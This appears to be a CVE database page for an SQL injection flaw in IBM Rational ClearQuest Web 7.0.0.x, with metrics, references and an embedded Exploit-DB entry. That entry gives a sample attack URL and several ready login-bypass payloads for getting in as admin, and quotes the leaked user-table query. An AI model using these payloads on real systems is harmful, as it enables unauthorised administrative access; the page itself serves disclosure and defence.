CVE-2007-4368 : Detail

CVE-2007-4368

SQL Injection
A03-Injection
49.23%V3
Network
2007-08-15
21h00 +00:00
2018-10-15
18h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in /main in IBM Rational ClearQuest (CQ) Web 7.0.0.0-IFIX02 and 7.0.0.1 allows remote attackers to execute arbitrary SQL commands via the username parameter in a GenerateMainFrame command.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 4286

Publication date : 2007-08-13 22h00 +00:00
Author : s4squatch
EDB Verified : Yes

+==============================================================+ + IBM Rational ClearQuest Web Login Bypass (SQL Injection) + +==============================================================+ DISCOVERED BY: ============== SecureState sasquatch - [email protected] rel1k - [email protected] HOMEPAGE: ========= www.securestate.com AFFECTED AREA: =============== The username field on the login page is where the application is susceptible to SQL injection... SAMPLE URL: =========== http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE Log in as "admin": ================== ' OR login_name LIKE '%admin%'-- (other variations work as well) ' OR login_name LIKE 'admin%'-- ' OR LOWER(login_name) LIKE '%admin%'-- ' OR LOWER(login_name) LIKE 'admin%'-- etc...use your imagination... Confirmed against: ================== version 7.0.0.1 Label BALTIC_PATCH.D0609.929 version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630 FULL SQL Statement is spit back in error message: ================================================= SELECT master_users.master_dbid, master_users.login_name, master_users.encrypted_password, master_users.email, master_users.fullname, master_users.phone, master_users.misc_info, master_users.is_active, master_users.is_superuser, master_users.is_appbuilder, master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask FROM master_users WHERE login_name = 'INJECTION GOES HERE # milw0rm.com [2007-08-14]

Products Mentioned

Configuraton 0

Ibm>>Rational_clearquest >> Version 7.0.0.0

Ibm>>Rational_clearquest >> Version 7.0.0.1

References

http://securityreason.com/securityalert/3012
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/25324
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4286
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/36478
Tags : vdb-entry, x_refsource_OSVDB
http://www.securitytracker.com/id?1018569
Tags : vdb-entry, x_refsource_SECTRACK